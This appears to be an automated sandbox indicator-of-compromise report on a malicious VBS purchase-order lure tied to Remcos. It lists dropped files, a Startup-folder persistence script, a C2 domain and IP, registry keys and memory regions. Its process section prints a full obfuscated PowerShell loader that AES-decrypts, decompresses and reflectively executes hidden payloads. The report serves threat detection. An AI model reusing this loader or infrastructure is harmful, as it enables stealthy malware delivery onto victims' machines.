IOC Report
PO#2195112.vbs

loading gif

Files

File Path
Type
Category
Malicious
PO#2195112.vbs
ASCII text, with very long lines (65493), with CRLF line terminators
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
modified
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd
ASCII text, with very long lines (57944), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\dropped.bat
ASCII text, with very long lines (57944), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqquqoso.ej0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_guhx1ir3.4ob.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ih41ueii.2y3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ke0fwi21.nbe.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nkln13hb.bmr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0ual0dm.gjs.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5kazo3e.x1q.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xauxqvsl.prh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhv8D61.tmp
Extensible storage user DataBase, version 0x620, checksum 0xaf3ea1a6, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\oaanp
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
\Device\ConDrv
ASCII text, with very long lines (2026), with CRLF line terminators
dropped
There are 8 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO#2195112.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\dropped.bat
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd" "
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qungqkxv"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qungqkxv"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\bxtzrdixjge"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 7 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://geoplugin.net/json.gp
178.237.33.50
https://www.google.com
unknown
https://www.office.com/
unknown
http://www.imvu.comr
unknown
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
unknown
https://aefd.nelreports.net/api/report?cat=bingaot
unknown
https://aka.ms/pscore6lB
unknown
https://aefd.nelreports.net/api/report?cat=bingth
unknown
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
unknown
http://www.imvu.com
unknown
https://aefd.nelreports.net/api/report?cat=wsb
unknown
https://aefd.nelreports.net/api/report?cat=bingrms
unknown
http://www.nirsoft.net
unknown
https://aefd.nelreports.net/api/report?cat=bingaotak
unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
unknown
http://www.ebuddy.com
unknown
There are 11 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ab9001.ddns.net
64.188.16.157
malicious
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
64.188.16.157
ab9001.ddns.net
United States
malicious
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\chrorne-ML89BO
exepath
HKEY_CURRENT_USER\SOFTWARE\chrorne-ML89BO
licence
HKEY_CURRENT_USER\SOFTWARE\chrorne-ML89BO
time

Memdumps

Base Address
Regiontype
Protect
Malicious
798F000
stack
page read and write
7340000
heap
page execute and read and write
2D63000
heap
page read and write
7AD0000
trusted library allocation
page read and write
BA0000
heap
page read and write
6C7B000
stack
page read and write
2EA0000
heap
page read and write
C3A000
heap
page read and write
1EA25B00000
heap
page read and write
1EA23569000
heap
page read and write
788C000
heap
page read and write
324E000
stack
page read and write
7295000
heap
page read and write
7480000
trusted library allocation
page read and write
6D3E000
stack
page read and write
C73000
heap
page read and write
3043000
heap
page read and write
4B0E000
stack
page read and write
7AF0000
trusted library allocation
page read and write
1EA2358D000
heap
page read and write
6029000
trusted library allocation
page read and write
1EA235C0000
heap
page read and write
4C42000
trusted library allocation
page read and write
6E90000
heap
page read and write
2DF0000
heap
page read and write
5B99000
trusted library allocation
page read and write
4B7E000
trusted library allocation
page read and write
3190000
heap
page read and write
2ED3000
heap
page read and write
4B4E000
stack
page read and write
4A00000
heap
page read and write
2F70000
heap
page read and write
8CD000
stack
page read and write
5046000
trusted library allocation
page read and write
912000
stack
page read and write
78A1000
heap
page read and write
86281FE000
stack
page read and write
459000
system
page execute and read and write
2FC0000
heap
page read and write
720B000
stack
page read and write
2D65000
trusted library allocation
page execute and read and write
1EA24F30000
heap
page read and write
88B000
stack
page read and write
1EA25F90000
heap
page read and write
501B000
heap
page read and write
74F0000
trusted library allocation
page read and write
1EA23440000
heap
page read and write
6C3D000
stack
page read and write
1EA26DDA000
heap
page read and write
2EA0000
heap
page read and write
CC0000
trusted library allocation
page read and write
74A2000
trusted library allocation
page read and write
AAF000
unkown
page read and write
1EA26EDE000
heap
page read and write
3390000
heap
page read and write
707E000
stack
page read and write
1EA235C0000
heap
page read and write
6E80000
heap
page read and write
1EA23445000
heap
page read and write
2E00000
heap
page execute and read and write
4F10000
heap
page read and write
400000
system
page execute and read and write
1EA26A5E000
heap
page read and write
5076000
heap
page read and write
1EA24E80000
heap
page read and write
4E8E000
stack
page read and write
50C1000
trusted library allocation
page read and write
CCD000
trusted library allocation
page execute and read and write
1EA23511000
heap
page read and write
4F3C000
trusted library allocation
page read and write
2FDF000
unkown
page read and write
400000
system
page execute and read and write
4C45000
trusted library allocation
page read and write
1EA23535000
heap
page read and write
328F000
stack
page read and write
7540000
trusted library allocation
page read and write
940000
heap
page read and write
7131000
heap
page read and write
72A0000
heap
page read and write
3580000
heap
page read and write
794E000
stack
page read and write
7851000
heap
page read and write
1EA23410000
heap
page read and write
1EA23537000
heap
page read and write
6E3D000
stack
page read and write
1EA2350A000
heap
page read and write
1EA235C9000
heap
page read and write
1EA23545000
heap
page read and write
3002000
heap
page read and write
786B000
heap
page read and write
2FDC000
stack
page read and write
990000
heap
page read and write
501F000
heap
page read and write
743E000
stack
page read and write
4A20000
heap
page read and write
4C3A000
trusted library allocation
page read and write
4C37000
trusted library allocation
page read and write
C78000
stack
page read and write
32C0000
heap
page read and write
2DCE000
stack
page read and write
7F40000
trusted library allocation
page read and write
6CBE000
stack
page read and write
3240000
heap
page read and write
86280FE000
stack
page read and write
7A70000
heap
page read and write
4FF0000
heap
page read and write
7A10000
trusted library allocation
page read and write
8C8000
stack
page read and write
4AC0000
heap
page execute and read and write
7AC0000
trusted library allocation
page read and write
32E4000
trusted library allocation
page read and write
32F9000
trusted library allocation
page read and write
1EA25340000
heap
page read and write
9EE000
unkown
page read and write
1EA26D37000
heap
page read and write
473000
system
page execute and read and write
4B60000
heap
page read and write
84F0000
trusted library allocation
page read and write
30EF000
heap
page read and write
1EA23545000
heap
page read and write
1EA25658000
heap
page read and write
7A20000
trusted library allocation
page execute and read and write
8500000
trusted library allocation
page read and write
C12000
heap
page read and write
2D83000
heap
page read and write
5001000
trusted library allocation
page read and write
53FE000
trusted library allocation
page read and write
3293000
heap
page read and write
1EA235C9000
heap
page read and write
2E4E000
stack
page read and write
528E000
stack
page read and write
1EA26D31000
heap
page read and write
2D60000
heap
page read and write
33EE000
unkown
page read and write
2DAE000
unkown
page read and write
BE0000
heap
page read and write
3360000
heap
page read and write
49CE000
stack
page read and write
4C4E000
trusted library allocation
page read and write
32E3000
trusted library allocation
page execute and read and write
C3E000
heap
page read and write
350F000
unkown
page read and write
C77000
heap
page read and write
4F40000
trusted library allocation
page read and write
86287FD000
stack
page read and write
1EA23561000
heap
page read and write
766E000
stack
page read and write
456000
system
page execute and read and write
502F000
heap
page read and write
7AA0000
trusted library allocation
page read and write
3317000
trusted library allocation
page execute and read and write
6D7A000
stack
page read and write
3000000
heap
page read and write
8F6000
stack
page read and write
6001000
trusted library allocation
page read and write
86283FE000
stack
page read and write
6DFE000
stack
page read and write
2FC3000
heap
page read and write
2D89000
heap
page read and write
789D000
heap
page read and write
1EA25B01000
heap
page read and write
6E7B000
stack
page read and write
3312000
trusted library allocation
page read and write
1EA235C0000
heap
page read and write
35E0000
heap
page read and write
73FE000
stack
page read and write
1EA260E8000
heap
page read and write
4AC5000
heap
page execute and read and write
4A2E000
stack
page read and write
52F0000
trusted library allocation
page read and write
71CD000
stack
page read and write
7520000
heap
page read and write
707E000
stack
page read and write
7330000
trusted library allocation
page read and write
73BE000
stack
page read and write
7281000
heap
page read and write
72B8000
heap
page read and write
41B000
system
page execute and read and write
724E000
stack
page read and write
7810000
heap
page read and write
5260000
trusted library allocation
page read and write
1EA26D4D000
heap
page read and write
32E0000
trusted library allocation
page read and write
74E0000
trusted library allocation
page read and write
7F50000
trusted library allocation
page read and write
5208000
trusted library allocation
page read and write
1EA26D4D000
heap
page read and write
7350000
trusted library allocation
page read and write
1EA26D37000
heap
page read and write
3762000
heap
page read and write
1EA25552000
heap
page read and write
7510000
trusted library allocation
page read and write
3192000
heap
page read and write
72AB000
heap
page read and write
72C8000
heap
page read and write
3290000
heap
page read and write
728B000
heap
page read and write
759B000
stack
page read and write
1EA23519000
heap
page read and write
1EA235C9000
heap
page read and write
32D0000
trusted library allocation
page read and write
747D000
stack
page read and write
86286FE000
stack
page read and write
3264000
heap
page read and write
50D7000
trusted library allocation
page read and write
3340000
heap
page readonly
7500000
trusted library allocation
page read and write
3413000
heap
page read and write
3086000
heap
page read and write
1EA2358F000
heap
page read and write
8DC000
stack
page read and write
52D0000
heap
page read and write
2E90000
trusted library allocation
page execute and read and write
1EA235C0000
heap
page read and write
782E000
heap
page read and write
70FE000
stack
page read and write
70FE000
stack
page read and write
1EA26A5B000
heap
page read and write
C15000
heap
page read and write
2D62000
trusted library allocation
page read and write
730A000
stack
page read and write
4F9E000
stack
page read and write
BD3000
heap
page read and write
90F000
stack
page read and write
3290000
heap
page read and write
1EA26650000
trusted library allocation
page read and write
1EA234E0000
heap
page read and write
1EA2358D000
heap
page read and write
4C3F000
trusted library allocation
page read and write
1EA26C30000
heap
page read and write
1EA23450000
heap
page read and write
2DEF000
unkown
page read and write
3740000
heap
page read and write
755E000
stack
page read and write
2EFA000
stack
page read and write
86285FE000
stack
page read and write
BA3000
heap
page read and write
49D0000
trusted library allocation
page read and write
4FEE000
stack
page read and write
7A40000
trusted library allocation
page read and write
1EA23561000
heap
page read and write
4F2C000
stack
page read and write
33F0000
heap
page read and write
35EE000
heap
page read and write
783E000
heap
page read and write
9A0000
heap
page readonly
70BE000
stack
page read and write
1EA23569000
heap
page read and write
B90000
heap
page read and write
2D49000
trusted library allocation
page read and write
4E4A000
trusted library allocation
page read and write
1EA235C9000
heap
page read and write
33A0000
heap
page readonly
1EA23535000
heap
page read and write
2ED7000
heap
page read and write
2E8C000
stack
page read and write
74B0000
trusted library allocation
page read and write
2D80000
trusted library allocation
page read and write
914000
stack
page read and write
6CFF000
stack
page read and write
1EA23519000
heap
page read and write
7AE0000
trusted library allocation
page read and write
7340000
heap
page read and write
7360000
trusted library allocation
page execute and read and write
703E000
stack
page read and write
1EA2583B000
heap
page read and write
7330000
heap
page read and write
BAC000
heap
page read and write
1EA25D0F000
heap
page read and write
4F30000
heap
page execute and read and write
8627DAA000
stack
page read and write
3315000
trusted library allocation
page execute and read and write
1EA26D30000
heap
page read and write
32ED000
trusted library allocation
page execute and read and write
1EA2357E000
heap
page read and write
74A0000
trusted library allocation
page read and write
762F000
stack
page read and write
703E000
stack
page read and write
4C74000
trusted library allocation
page read and write
1EA26E31000
heap
page read and write
4AAE000
stack
page read and write
7B10000
trusted library allocation
page execute and read and write
B30000
heap
page read and write
5031000
trusted library allocation
page read and write
75EE000
stack
page read and write
3410000
heap
page read and write
C1F000
heap
page read and write
2DD0000
heap
page readonly
A20000
heap
page read and write
4F88000
trusted library allocation
page read and write
CC3000
trusted library allocation
page execute and read and write
A6E000
unkown
page read and write
9F0000
heap
page read and write
7550000
trusted library allocation
page read and write
1EA235D1000
heap
page read and write
500C000
trusted library allocation
page read and write
4ECE000
stack
page read and write
4F35000
heap
page execute and read and write
309E000
heap
page read and write
72BF000
heap
page read and write
3138000
heap
page read and write
354E000
stack
page read and write
32F0000
trusted library allocation
page read and write
50C4000
trusted library allocation
page read and write
538F000
stack
page read and write
2D7B000
heap
page read and write
74DD000
stack
page read and write
2F80000
heap
page readonly
1EA25373000
heap
page read and write
1EA23330000
heap
page read and write
4B81000
trusted library allocation
page read and write
1EA25D06000
heap
page read and write
76D1000
heap
page read and write
1EA26D3A000
heap
page read and write
3040000
heap
page read and write
1EA2357A000
heap
page read and write
2E9E000
stack
page read and write
324C000
heap
page read and write
A28000
heap
page read and write
4E8F000
stack
page read and write
2F90000
heap
page read and write
74C0000
trusted library allocation
page read and write
1EA2583D000
heap
page read and write
79CE000
stack
page read and write
526A000
trusted library allocation
page read and write
50C9000
trusted library allocation
page read and write
2D60000
heap
page read and write
7A90000
trusted library allocation
page read and write
1EA2350B000
heap
page read and write
50CE000
trusted library allocation
page read and write
35EF000
unkown
page read and write
7220000
heap
page read and write
C3B000
stack
page read and write
8FB000
stack
page read and write
5049000
heap
page read and write
4BA7000
trusted library allocation
page read and write
323E000
unkown
page read and write
4BB8000
trusted library allocation
page read and write
1EA26EDD000
heap
page read and write
4C4B000
trusted library allocation
page read and write
5063000
trusted library allocation
page read and write
751E000
stack
page read and write
4E6C000
trusted library allocation
page read and write
49F0000
heap
page read and write
72B3000
heap
page read and write
1EA23512000
heap
page read and write
1EA23519000
heap
page read and write
B60000
heap
page read and write
1EA23578000
heap
page read and write
713F000
stack
page read and write
1EA26640000
heap
page read and write
1EA25550000
heap
page read and write
1EA26D36000
heap
page read and write
7A30000
trusted library allocation
page read and write
7A0D000
stack
page read and write
5021000
heap
page read and write
74D0000
trusted library allocation
page read and write
1EA26D31000
heap
page read and write
6BAE000
stack
page read and write
1EA23545000
heap
page read and write
7A50000
trusted library allocation
page read and write
1EA23535000
heap
page read and write
3034000
heap
page read and write
86289FC000
stack
page read and write
7874000
heap
page read and write
4B91000
trusted library allocation
page read and write
5B71000
trusted library allocation
page read and write
2D6C000
heap
page read and write
319E000
heap
page read and write
4B71000
trusted library allocation
page read and write
B2F000
stack
page read and write
787A000
heap
page read and write
35E4000
heap
page read and write
4C32000
trusted library allocation
page read and write
1EA23537000
heap
page read and write
2D40000
trusted library allocation
page read and write
3310000
trusted library allocation
page read and write
7291000
heap
page read and write
2D67000
trusted library allocation
page execute and read and write
50FF000
trusted library allocation
page read and write
1EA25554000
heap
page read and write
30DF000
stack
page read and write
5BDA000
trusted library allocation
page read and write
1EA2356F000
heap
page read and write
72CE000
stack
page read and write
7A80000
trusted library allocation
page read and write
2D60000
trusted library allocation
page read and write
4F50000
heap
page execute and read and write
8628AFF000
stack
page read and write
4BE2000
trusted library allocation
page read and write
300C000
heap
page read and write
787E000
heap
page read and write
7B00000
trusted library allocation
page read and write
C84000
heap
page read and write
1EA24E90000
heap
page read and write
7AB0000
trusted library allocation
page read and write
1EA23561000
heap
page read and write
7490000
trusted library allocation
page read and write
1EA25658000
heap
page read and write
6069000
trusted library allocation
page read and write
329C000
heap
page read and write
45C000
system
page execute and read and write
1EA26DB7000
heap
page read and write
1EA26D39000
heap
page read and write
AEE000
stack
page read and write
3194000
heap
page read and write
3350000
trusted library allocation
page execute and read and write
6009000
trusted library allocation
page read and write
1EA25F0E000
heap
page read and write
7A60000
trusted library allocation
page read and write
6DBE000
stack
page read and write
3239000
stack
page read and write
2EBC000
stack
page read and write
400000
system
page execute and read and write
35E2000
heap
page read and write
1EA25FE0000
heap
page read and write
45D000
system
page execute and read and write
1EA26D4D000
heap
page read and write
3130000
heap
page read and write
76AE000
stack
page read and write
3760000
heap
page read and write
50D2000
trusted library allocation
page read and write
CC4000
trusted library allocation
page read and write
5010000
heap
page read and write
1EA25320000
heap
page read and write
70BF000
stack
page read and write
1EA26E30000
heap
page read and write
2ED0000
heap
page read and write
7560000
trusted library allocation
page execute and read and write
1EA25554000
heap
page read and write
4A6E000
stack
page read and write
7530000
trusted library allocation
page read and write
53B4000
trusted library allocation
page read and write
77F0000
heap
page execute and read and write
49F4000
heap
page read and write
1EA23537000
heap
page read and write
1EA25551000
heap
page read and write
CB0000
trusted library allocation
page read and write
1EA23579000
heap
page read and write
86284FE000
stack
page read and write
77E0000
trusted library allocation
page read and write
728F000
stack
page read and write
3764000
heap
page read and write
1EA23569000
heap
page read and write
1EA23571000
heap
page read and write
3330000
trusted library allocation
page read and write
3197000
heap
page read and write
There are 437 hidden memdumps, click here to show them.